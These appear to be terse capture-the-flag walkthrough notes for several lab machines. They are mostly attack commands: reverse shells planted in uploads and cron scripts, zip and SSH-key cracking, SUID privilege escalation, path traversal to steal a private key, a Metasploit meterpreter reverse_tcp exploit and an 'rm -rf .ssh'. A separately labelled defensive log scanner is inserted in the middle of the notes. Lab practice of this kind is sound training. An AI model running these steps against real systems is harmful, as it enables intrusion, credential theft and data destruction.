H1: easy
1- gobuster dir -u http://ip -w /usr/share/wordlists/dirbuster/<listname>
2- go to port 8002
3-php reverse shell
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
4- after getting the reverse shell, go to /home/serv3/backups
5-cat backup.sh
6- chmod -R a+rwX backup.sh
7- listen for the reverse shell and wait, then
go to revshells.com and put the Python3 #2 reverse shell inside the backup
------------------------------------------------------------------------
Hogwarts
1- nmap -sC -sV -A -p- -vv ip -oN <outfile>
2- ftp 10.10.160.93 -p 7259, user is anonymous
3- get .IamHidden
4-cd ...
5- get GoAway.exe
6- cd ...
ls -la
get the files
7-exit ftp
8-unzip .I_saved_it_harry.zip
9- fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt .I_saved_it_harry.zip
unzip the file, pass is qwer1234
cd boot
cat .pass
ssh with creds:
ssh neville@ip -p 9075
find / -type f -perm -4000 2>/dev/null
go to: https://gtfobins.github.io/
ip netns add foo
ip netns add foo
#whoami? roooot
-----------------------------------------------------
carrange:
nmap -sC -sV -p 82 ip
get revshell
mv revshell.php bbsi.gif
nc -lnvp port
upload the revshell
go to ip/82/images
cd /var/www/html/web1
strings web.db  
echo "the base64" | base64 -d
ssh bobba@
find / -perm /4000 2>/dev/null
you can run find as root
find . -exec /bin/sh \; -quit

chmod 700 to files
cd /home/duku
rm -rf .ssh
-------------------------------
lion:
go to http://machine_ip:5555/?page=../../../home/gloria/.ssh/id_rsa
ssh2john id_rsa > john
john -w=/usr/share/wordlists/rockyou.txt john
ssh -i id_rsa -p 1337 gloria@ip
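
Seen from the server side, the `?page=../../../home/gloria/.ssh/id_rsa` request above leaves a recognisable trace in the web access log. The following is an added example, not part of the original notes: a log check that flags path traversal in query parameters and goes beyond the single case in the notes by also decoding nested percent-encoding. The combined log format, the sample lines, the IP addresses and the sensitive-file list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined-log-format prefix: client IP ... "METHOD target HTTP/x.y" status
REQ = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Files a page-include parameter should never resolve to (illustrative list).
SENSITIVE = re.compile(r"\.ssh/|id_rsa|authorized_keys|/etc/passwd|/etc/shadow")

# Constructed sample lines; addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /?page=about.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /?page=../../../home/gloria/.ssh/id_rsa HTTP/1.1" 200 1766',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 153',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> .), bounded to 3 passes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_line(line):
    """Return a finding dict for the first suspicious query parameter, else None."""
    m = REQ.match(line)
    if not m:
        return None
    for name, raw in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        value = fully_decode(raw).replace("\\", "/")
        reasons = []
        if "../" in value or value.endswith(".."):
            reasons.append("dot-dot segment")
        if value.startswith("/"):
            reasons.append("absolute path")
        if SENSITIVE.search(value):
            reasons.append("sensitive file")
        if reasons:
            return {"ip": m["ip"], "param": name, "value": value,
                    "reasons": reasons, "served": m["status"] == "200"}
    return None

def scan(lines):
    return [f for f in map(check_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `served` set to true (HTTP 200) is the one to triage first, since the server answered the request normally; if the file was a private key, rotate it.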
another path
msfconsole
searchsploit nostromo 1.9.6
use 0
set rport 8080
set rhost machine_ip
check
set payload linux/x86/meterpreter/reverse_tcp
set lhost tun0
exploit
/usr/bin/tmux -S /.dev/session
---------------------------------
Hackers:
ftp 10.10.166.184
get note